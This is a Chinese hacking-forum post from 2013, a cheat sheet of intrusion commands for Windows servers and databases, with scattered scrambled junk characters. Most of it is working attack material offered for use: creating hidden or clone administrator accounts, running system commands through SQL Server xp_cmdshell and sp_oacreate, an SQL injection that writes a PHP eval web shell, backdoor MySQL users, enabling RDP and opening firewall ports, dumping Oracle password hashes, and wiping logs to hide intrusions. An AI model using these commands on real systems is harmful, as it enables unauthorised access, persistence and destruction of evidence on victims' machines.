找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4955|回复: 0
打印 上一主题 下一主题

渗透技术大全

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:24:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

; J# m" G: b, F* T  y" T+ N1.net user administrator /passwordreq:no
& W, Y" \/ M) E& h/ E这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
) u; u9 x+ t; d+ v2.比较巧妙的建克隆号的步骤5 G# M+ K) H- N% U' P- l
先建一个user的用户
/ @' N5 }1 q1 H然后导出注册表。然后在计算机管理里删掉
: F5 l: }" V( X: V3 b, w2 j# ?在导入,在添加为管理员组
9 H& D0 R6 y0 j4 ]! x, |3.查radmin密码
+ m; X: T& R+ ?- E" I# |) Z7 b" yreg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg! S! |% b3 Z$ M' p: d0 k
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
/ {% J) K3 O9 e: L3 W- x. i建立一个"services.exe"的项) c6 N5 H6 L+ F' }; G, e* _
再在其下面建立(字符串值)
9 M+ I$ C; ?" C0 h+ y- W" s键值为mu ma的全路径
: `' I. H* G' E. Q: v! w) C5.runas /user:guest cmd
* ^1 H/ g7 m  X! F; S测试用户权限!3 D% Y/ w: e9 _# N& v6 m
6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?; O6 J8 K& x2 k( a
7.入侵后漏洞修补、痕迹清理,后门置放:' }( e6 h/ P0 Z  G4 n2 P  @  C
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
; {: v9 `/ h2 \( J% o8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c: ]  n6 H" s& ?* \0 `$ Q) y
; v$ Q$ [. w0 [) _1 j& i
for example0 _% T9 s9 U/ k- W
. V# \* D# B6 \
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
) L; J4 i/ s% Y5 i. H! K: f: h. @7 J9 }6 }" u! C9 K! b$ m! `
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'& F8 I: o1 M' V* ~1 v' O

% N" W/ F( X& ~# P/ B  y& S9:MSSQL SERVER 2005默认把xpcmdshell 给ON了2 u6 T9 s- A  t; f; l$ c4 L) g
如果要启用的话就必须把他加到高级用户模式
9 D% G. r3 J( d0 C# Q可以直接在注入点那里直接注入
  L3 v, B$ D( z. N: }4 R- Y! Iid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
& I! q* q' m9 n3 r# ]9 q. h1 i: J  L然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
2 j! U0 R7 n, O  E4 [! Q9 A或者; S/ p; X% _' i+ S5 L" M
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
' E7 @4 X5 C9 w1 q  I9 r" x来恢复cmdshell。) |& K5 d# ~* I' S# o% k) v
- I7 T" Y3 w' @( R& Q" p! f; E2 D! ~+ V
分析器  L1 x! g8 l& u0 M
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--8 j: |8 G7 L$ ]5 u
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
4 S2 R3 j- e. d' V5 @5 k! H10.xp_cmdshell新的恢复办法) }5 d5 A/ f: p# E) y
xp_cmdshell新的恢复办法
; h5 g: m9 L# }8 p扩展储存过程被删除以后可以有很简单的办法恢复:1 @1 p0 A$ e  _* {
删除
9 w  p! g% ]5 b- m% E" G4 cdrop procedure sp_addextendedproc
5 V' F$ v9 m0 f* ]7 h- ndrop procedure sp_oacreate. x: |7 @4 T# O( P  s! Y+ i
exec sp_dropextendedproc 'xp_cmdshell'
3 w0 d, D9 D; p5 z6 f) q
8 i( r" C6 W! P2 }恢复
- v/ Q% z2 x" x% Y& W3 odbcc addextendedproc ("sp_oacreate","odsole70.dll")2 U' v& C1 H$ B: v5 L: Z
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")* I: p+ h! B. x+ Z) _. S' M  f/ y
* Q' M: L+ X3 j  N
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
0 B' a: U7 q1 h
! d6 g: F( d1 I. \-----------------------------5 c: p' m/ N4 @# E. Q' F

& g+ F- A" U  H' ]9 o7 W删除扩展存储过过程xp_cmdshell的语句:
9 |# m1 q: k% r6 K: G" Mexec sp_dropextendedproc 'xp_cmdshell'9 U( x& e6 u4 ?9 s. G
+ x+ c2 v! q8 F% Y( o8 U
恢复cmdshell的sql语句, I; p) |- t" |% q
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
3 }/ d( T: R  I; Z' S' c4 k% t' I2 o' |, _+ f6 L# C  \

+ y' c- z# ^" w开启cmdshell的sql语句# X* B% O: W5 J& a% R
6 Q$ f/ K' {1 Y0 i5 C" P) e- ]
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
1 y5 r& c0 |2 {+ m5 ?8 v
$ {3 v1 w0 }, Y* p- s( M判断存储扩展是否存在) |% r0 E+ n9 r1 T% l* R
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'4 e* ]* H$ B1 b
返回结果为1就ok
- g. U4 n' o1 R9 J! v
3 P" R/ y2 `2 H$ o3 F. ]3 @% h恢复xp_cmdshell
1 m4 a, A1 e# n7 O: n9 n! }exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
. {2 d: F9 o3 X1 O" m返回结果为1就ok
/ ^$ Q7 g4 c. b  t0 b3 m% x. S8 H/ R: {0 N: O
否则上传xplog7.0.dll
/ c8 |( a/ o9 `9 `  sexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
% A; t3 {; r9 X5 Y
7 a& P$ ~& v  W2 ^9 R: s( }堵上cmdshell的sql语句
) K, ~0 f  |. g: L4 @sp_dropextendedproc "xp_cmdshel
7 G2 k2 c+ T" Q, K( |-------------------------
0 O5 B$ m$ h% c, L清除3389的登录记录用一条系统自带的命令:; V" e% L7 Z1 h5 J6 ]& h; V+ J
reg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f) I- v$ e+ b( i0 o( ?% Q- R

" o+ M) A2 n9 z然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件, i! J, w- x" h# [' j4 A: J
在 mysql里查看当前用户的权限# P9 {. O1 Z$ a. f
show grants for  2 h, v! S. G& d8 ^1 L: h

$ E% ^  k$ I5 x2 i0 f以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。9 Y4 E8 E+ [2 ?& @7 n

# H+ V5 ^- V; l4 C5 j1 J) m" d  G' _8 t! b
Create USER 'itpro'@'%' IDENTIFIED BY '123';1 a. S$ s7 y& `' j! N! Q

! x- Z& J: d) I. ?GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
1 y  V; V4 }" n* I* T
* f  x# {  y, l( {- v) |7 `MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 09 @6 ^2 T- `# u# |

# e/ r0 D  C2 r' H9 w. O+ S* IMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;3 J4 w# A- z" |

8 `4 U! }+ R2 F7 @搞完事记得删除脚印哟。
$ A7 Y% g) l: s7 C3 C
7 z0 ~8 Z- {- u% ^( S6 i9 L: aDrop USER 'itpro'@'%';8 [! @7 D* g6 }9 F  X

  ], G8 L' o) x7 lDrop DATABASE IF EXISTS `itpro` ;
* a3 C, ?2 C: A( {" s" G9 M
* ?) Y/ w1 v% H8 e) J2 T) q当前用户获取system权限+ t# Y" a* {% f' X. ^' G1 b! K7 `
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact) X$ W- F& @8 b; K) V* g3 i
sc start SuperCMD$ u3 A  Y# Z1 r
程序代码
8 q( l8 r; ^2 F. b<SCRIPT LANGUAGE="VBScript">
- C6 X7 n! A& j) x4 ^set wsnetwork=CreateObject("WSCRIPT.NETWORK")4 n. L4 ^$ G& m/ Y/ f
os="WinNT://"&wsnetwork.ComputerName
9 \$ T1 U! C4 U, Z. C( m  [$ HSet ob=GetObject(os)$ Y; f. A/ }) B! x8 v
Set oe=GetObject(os&"/Administrators,group")# z, }- b: y6 A) y, J! E
Set od=ob.Create("user","nosec")- T0 u2 H' @, m$ b. W0 ^, G. l+ z
od.SetPassword "123456abc!@#"
* L' M) Q; L7 }0 Z0 p" f# i* god.SetInfo
: N& v+ W4 T' u  H3 F5 C6 G# n$ }Set of=GetObject(os&"/nosec",user)( X2 X# t8 ^% x/ i: p0 f% g
oe.add os&"/nosec"
% o) P7 m' ^  T- G% C- N</Script>2 E' r* H6 l9 D& N2 f
<script language=javascript>window.close();</script>$ B; F4 D4 z2 O( r& @9 e# d# x: D
0 x0 {5 j: J' Q

9 d  r" f; ?- Q. {7 Q# ?- s# A4 O& J6 A' O
$ L$ r, V8 b7 F( U- ~  R+ v6 R
突破验证码限制入后台拿shell
6 ]! E7 J% `2 {. ~% d. F7 ?3 l! x程序代码
! v( S2 V" I  k$ W9 hREGEDIT4
( W3 e7 z# F, a+ y/ E# K4 W[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
+ E' i: f2 \, O1 j  \  p! p"BlockXBM"=dword:00000000' t7 ~& e# i, K6 v( k6 T. t7 c# Y$ t
# ?# p5 Y; y# f. v3 m4 f/ g! p
保存为code.reg,导入注册表,重器IE
, N: f0 P, Q6 f$ x0 [就可以了
$ I1 Y3 L, s+ uunion写马
# h- l; l4 A8 |$ e5 V, ]程序代码, u' g- y# y5 Q: ^/ b) o
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*! T! k9 ]0 U1 m, p1 w' e" y( t
9 u2 j# W5 Z1 t" T1 Z' t
应用在dedecms注射漏洞上,无后台写马0 L  I7 Y9 P4 M" \
dedecms后台,无文件管理器,没有outfile权限的时候, {. E. @1 d2 Y+ {5 W; x) l
在插件管理-病毒扫描里9 t9 W6 r. M- z3 N
写一句话进include/config_hand.php里
1 [1 J5 m( \. u% ?8 u: W) Q程序代码
+ R, |+ j* f* u8 t>';?><?php @eval($_POST[cmd]);?>
+ Z  R  L) n8 R2 j) }. N9 N: H- P0 N, ^% Z
, P. V) ~/ d, H) G: y* [+ N
如上格式: N- T4 F* A# G9 h3 Y

% s; c9 O! k9 Ooracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
: a8 @) Q& K& a9 S程序代码  ^) s/ m! J' V" P. U
select username,password from dba_users;" Y1 B/ n0 \9 E6 p# N  y6 H8 ]

) u3 v' |2 v9 }# f+ H" Y( s$ d8 ~4 w9 A6 }) s) |
mysql远程连接用户3 Y. ?. q1 ]4 B6 r4 r) o/ W3 e6 B
程序代码  ]& m, |0 ]  V& ^1 t

' i& L5 K" c  d* p7 Z: nCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
4 b, U' s' x+ E2 G4 q% N" k+ x) K. lGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION/ M/ w' v4 \4 p. h  M; m
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0: @. }- J" W! v- p+ c4 C- R
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;! v. ~8 M4 Q5 x  N# A
4 a& R  N4 I5 Y7 c
' A8 C" s8 N+ N. ~$ [

9 b  X$ Z. I5 b9 A1 C3 z7 W) \" C, D  s) _" Q: Y" r2 y' S
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0# ^* g- ]: `& X+ |  E
5 b/ H0 T# c) l& k( e8 _7 y
1.查询终端端口
; k9 a& r* [+ e3 c$ P; B
" ~' [$ g5 o% a0 P, _xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
+ e1 P/ b! ]; ^# b4 L  B9 L( J+ R7 C' h' G. p
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"1 @/ ~4 Y2 q' w; Y" `
type tsp.reg, G/ {# g4 L' \" ^9 S# ]
$ \: |5 H& B$ i
2.开启XP&2003终端服务5 Z1 X" ]8 s% I& x7 P

* y9 p1 |4 R' _" Y- K+ e: J" a/ t) @) h: o/ B( C
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f# z/ T* j; t3 ^1 j: g' @' b; s' a

. ~2 z$ ~) S& n( Y8 Q7 d- c  ?! v5 ]( h0 w: f6 }
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f$ h: ~" I, A  t
5 n3 t: f6 B" ~1 h3 b0 o/ _
3.更改终端端口为20008(0x4E28)
2 c. S6 L$ ?2 ~1 O/ R' B/ Z( K2 Q) Y6 u" |
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f# V" r% H3 S5 l7 r7 v, l$ e6 r
7 s, I! V" L( g
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f0 P1 c: m- O) @# Y
: ?& _7 i7 r/ l) }" v
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
, n; y- j3 n$ Y5 v- E3 R5 x: S0 B: O3 K  L4 d
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
2 j% q$ |$ C  a! ~$ q* c7 i. F1 \5 ?! }9 a7 M
, N+ ]9 y4 \! v, e- ?
5.开启Win2000的终端,端口为3389(需重启)
" R$ c; [. p$ u7 n
  ]$ }) c3 e5 Xecho Windows Registry Editor Version 5.00 >2000.reg 9 {: o2 r8 ]) d- ?
echo. >>2000.reg
! b% a3 R  q% B% ?9 w4 B! X3 g( hecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
, L2 n# [+ M+ A! I" h. |echo "Enabled"="0" >>2000.reg & \* q5 r+ T, r& h1 K" x+ i
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
: h; t: q8 e; ]8 C, U5 J2 aecho "ShutdownWithoutLogon"="0" >>2000.reg
. d; G: O6 F+ kecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
6 Y* @9 X5 y0 [, v- [& ?- Techo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
7 o5 @( W8 e, w7 m$ P, @. ?echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
6 Z+ s5 n+ X! \echo "TSEnabled"=dword:00000001 >>2000.reg
# d6 ?/ N/ @# E. n( i8 ]1 [( Zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
, I' E" T; Q1 b# {4 Hecho "Start"=dword:00000002 >>2000.reg 7 ]% }, R+ N2 J: F3 O
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg 4 Y' k9 S* q1 [2 y5 m0 M
echo "Start"=dword:00000002 >>2000.reg
( C. Z: R; Y$ w( e( B4 Gecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg % Z- P4 {( e/ _, u
echo "Hotkey"="1" >>2000.reg
( r  U8 r' F" h9 i# A" _, {echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
' \0 M8 j8 m8 w  S3 T  Secho "ortNumber"=dword:00000D3D >>2000.reg 8 ^- I) x1 M  R9 j
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
+ U7 n: M! C, ?. [1 p& @echo "ortNumber"=dword:00000D3D >>2000.reg; T% x8 s  x* L

$ C" R9 z( _3 |  ?$ M% p6 A6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
3 x  F. S3 f! K) b. G: W( S+ c% Q4 @1 t9 Y( A% _" u0 K
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
- X/ |. X% z. e2 W( \/ _, \6 Q6 G(set inf=InstallHinfSection DefaultInstall)+ a/ U( |. m& c# }
echo signature=$chicago$ >> restart.inf
' P9 b* E$ u6 b* x! H( C9 n" Uecho [defaultinstall] >> restart.inf# z: E6 O6 {* ^" w" {% R
rundll32 setupapi,%inf% 1 %temp%\restart.inf
) y* S; n( `  }! v1 @' L9 _2 }6 P1 O. @2 N

( d9 {) ~; ]0 h' Y$ |7.禁用TCP/IP端口筛选 (需重启)
% j+ c/ ]1 {$ ~- Z5 Y/ O- W' ^4 }: C: h& Y% O& T. `- s
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
& d4 @# u  F, Y# v6 y  I4 j3 V
/ s2 r# n+ o$ q: K; N7 m8.终端超出最大连接数时可用下面的命令来连接+ W. U$ W5 G. h  J; E, g+ C1 X

" o1 i7 N5 J( r' L7 M8 h- rmstsc /v:ip:3389 /console
7 N: ^# q" m. q, n
* ~  w' z6 }) [9.调整NTFS分区权限
! R) I: U) P% L( S7 S) b) Z7 ^0 q( J/ w) y' H
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)* c/ a1 j% i! l8 D7 b* k+ K
' a9 R; t* ?1 a; a1 k7 `" O, B! Y
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)$ ?& j7 w4 F6 K7 f

- A5 O* q6 I# U------------------------------------------------------* G. n9 R" k+ r, Z' B
3389.vbs
" ^& W6 a0 W* i7 s5 X, mOn Error Resume Next
2 A; ~- Z2 s3 h& Iconst HKEY_LOCAL_MACHINE = &H80000002
+ T7 Q! X5 z5 p( D  Q( v* IstrComputer = "."3 @0 H3 m. a+ R( e
Set StdOut = WScript.StdOut
1 f" p  g/ ^; n+ O4 C5 SSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
. s' L+ L; W" d9 w# K. S8 ostrComputer & "\root\default:StdRegProv")# l# U7 j$ y7 Y- p, U: R
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
2 {5 v/ e/ S3 g+ c, R' z0 m; m6 {oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
0 Q1 b' I9 O( y8 \1 I* _strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
# }: \0 U0 p$ T: R, {, N6 zoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
* U: c3 Q6 O  ^! g- [7 DstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"  b4 Q- z- a! [- p
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
8 y. Z' F) F) [4 u% }+ kstrValueName = "fDenyTSConnections"
: L( }+ W0 z* @! C4 t# kdwValue = 0
9 G( G+ P( J: c. koreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
* q8 b' C7 @. O# Z5 Q9 ZstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"; ?3 d: m# h+ l( i% r# C
strValueName = "ortNumber"
; F  ?6 F. ]$ ?dwValue = 3389
& A& \' j' [  J) I/ k6 H: G* a& Qoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
: @4 p' ~2 s! V6 X" MstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
- w' O2 m8 |1 X: u1 q, ]) ~strValueName = "ortNumber"
2 `. S5 s8 c6 q- v- v0 _, gdwValue = 3389
" r! M, i! {7 h' j( F  j+ Qoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
1 Z& C' c% H4 e- h' VSet R = CreateObject("WScript.Shell") & c2 u% f9 T0 @% v6 c, q
R.run("Shutdown.exe -f -r -t 0") 8 h1 D7 ]' A- }/ k0 P

' _3 z6 e. c* `! U删除awgina.dll的注册表键值- C) f. f8 M( r  O7 K
程序代码) d2 T" X+ \/ |+ t  w1 |0 P/ e2 \
" P4 }4 _& T5 M/ h  M; C
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f8 x4 w0 G6 |* s7 v* U
# ]! S* p7 E; y3 D, c5 _3 n4 x

$ @' t$ K5 [8 J2 g
0 l# p. v6 s' S/ u% i0 Y6 J. }! b  ?* e6 u/ I" o
程序代码6 g" M$ r" Q8 B9 l/ }8 {* |$ J% A
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
2 J2 E! z( m* W& l7 P2 t+ t' q3 w' @4 ~0 D
设置为1,关闭LM Hash% l( J! v  w2 ?$ D
; i; G/ b& ~% p8 v7 j0 X' l( Z
数据库安全:入侵Oracle数据库常用操作命令
; j. |8 @' V7 Q- D: U8 @9 ~最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。- }) t$ Z( z' T% L0 S- s: [
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
: n$ L$ i6 G" i/ p" z2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
6 f- `6 z( d- Y8 I$ ]4 {+ t3、SQL>connect / as sysdba ;(as sysoper)或
, F+ r' a0 u$ k- `, ^1 I/ [. yconnect internal/oracle AS SYSDBA ;(scott/tiger)2 E4 q$ T! y5 D$ w# ^& t- F  g  S
conn sys/change_on_install as sysdba;
! W! J% ?1 G' ?. s2 |! J2 y- j" i4、SQL>startup; 启动数据库实例5 ~2 q8 ^. ~) R2 B/ e
5、查看当前的所有数据库: select * from v$database;- J5 @7 B% h* c& s4 {  C2 x
select name from v$database;5 q5 K& n% ~8 u! u/ j
6、desc v$databases; 查看数据库结构字段( u+ `. C1 a/ D' l+ z% F: H; X
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
0 D" W$ E, V; _SQL>select * from V_$PWFILE_USERS;, D5 U- t% m2 d% }, ?
Show user;查看当前数据库连接用户
' S5 b( J! z$ U! I% {/ n8、进入test数据库:database test;
7 ^& c" ~8 B( |0 k" D2 W# K9、查看所有的数据库实例:select * from v$instance;) K. E1 C4 v7 V1 j1 Q
如:ora9i
9 Q) q* Z& @, r- {( n3 \10、查看当前库的所有数据表:
* ]7 F7 {1 e8 i0 o: y! C! M2 K: I3 Y4 XSQL> select TABLE_NAME from all_tables;
' ~. u' u. Y; u' qselect * from all_tables;  T$ V" F. Z' e2 Z2 q, V4 p6 v4 P
SQL> select table_name from all_tables where table_name like '%u%';
2 `: m% k4 s1 R: d5 ]4 `TABLE_NAME
' u/ v1 t- n' G------------------------------
  D0 a! j; T) L* z8 p& ~+ n_default_auditing_options_
- i. }4 m4 o3 j; V0 D" |% i11、查看表结构:desc all_tables;7 ]9 f* y# C2 u5 e* O( E
12、显示CQI.T_BBS_XUSER的所有字段结构:7 S  G+ x  c" \5 p" h. G: G
desc CQI.T_BBS_XUSER;
' Z* g1 Z. n4 ?4 f) [13、获得CQI.T_BBS_XUSER表中的记录:3 Z+ Q$ ^, K; \6 Y) O
select * from CQI.T_BBS_XUSER;, ]9 d8 M5 u' A( [" @$ @7 o6 A0 M
14、增加数据库用户:(test11/test)/ X$ C( k! N/ [
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
1 ]" z  b& H5 k$ T& ^) E; o% J15、用户授权:7 I1 |) [0 X. F/ }, Z
grant connect,resource,dba to test11;/ h$ @0 s# F+ l7 A
grant sysdba to test11;0 Z' s9 {6 Z9 N/ f3 ^  k
commit;9 f% g, Y. e! }+ v) _5 f
16、更改数据库用户的密码:(将sys与system的密码改为test.)
2 \( `# G: ?( u9 o5 jalter user sys indentified by test;6 ]* b1 E. ^" Z% m- q: D! ?
alter user system indentified by test;
& k" U6 o$ K/ i9 L5 h( m0 K$ Q( q8 ?  K1 F: t) W- X
applicationContext-util.xml- \# z/ N( o  R& }  ~& @* w: S% |& I( H" h
applicationContext.xml
' i* G9 n( w% f7 y9 l1 Pstruts-config.xml1 z! f8 t, h& `# a& S. c. e
web.xml( ~+ L0 {  m$ ^2 S1 u( Z. d
server.xml
5 Z( x! }4 `0 R: `8 j* Btomcat-users.xml
) n# v& d4 P8 G2 f6 g7 Bhibernate.cfg.xml! w- h/ O1 x1 w
database_pool_config.xml
7 _( v) u# n+ T* F  @
; w" d% L. ?/ P
( h5 B' H4 x4 ^5 \3 T- k\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置# d; Q1 K4 q: m$ `5 @
\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini
* H. x0 h) L5 `. E5 T2 }1 ^\WEB-INF\struts-config.xml  文件目录结构! k  q3 n$ m# ]2 ~
" L* G) U0 M/ e' L1 C
spring.properties 里边包含hibernate.cfg.xml的名称/ N1 o2 y6 z* n. r" d" s: z& R1 q
2 M1 K2 H' N# y! d% P2 E  Q

; X% N% b3 C; n% g  b% m- QC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
2 e8 {- Z6 @$ L* p; ]' u
5 {8 p1 I7 B! d' m/ t7 ~如果都找不到  那就看看class文件吧。。$ B7 p) S( Y1 {. }
) M/ p- M6 f' _* L- J  N
测试1:! h! y  X) g0 [# G9 \7 _  J, Z
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
  q$ U5 n: L( i, `& J& A$ i7 Y
. N5 c0 v5 l3 J9 a测试2:
/ p! w! O. Z9 m% i1 M  w7 `$ _  Q
create table dirs(paths varchar(100),paths1 varchar(100), id int)
) I& w( l1 w& O0 t
" e+ L$ m" r. A) ]! J" a0 @delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--) }% |) k1 b% g3 T9 z
3 a+ ?, H! b" E4 o, F$ r8 g4 A9 f
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
5 R0 J0 E  d2 i
8 {0 U6 e$ \& u! ?: l; g' a9 Z查看虚拟机中的共享文件:
/ u9 A2 k5 |2 X7 ]3 u在虚拟机中的cmd中执行% L) `8 o6 q0 a+ r
\\.host\Shared Folders
6 B; T3 @! v- e; i8 M' y0 [7 r+ X6 I
cmdshell下找终端的技巧5 S9 l& d9 H0 f# y
找终端: 5 f+ {3 |" h( M
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! " W8 T/ J$ z3 H# {( H
   而终端所对应的服务名为:TermService 9 o  Z1 P" F+ W( r
第二步:用netstat -ano命令,列出所有端口对应的PID值!
* x5 o5 I' t' |# ^( z9 C( T   找到PID值所对应的端口* S4 n8 y# J4 e1 L1 Q$ v/ N

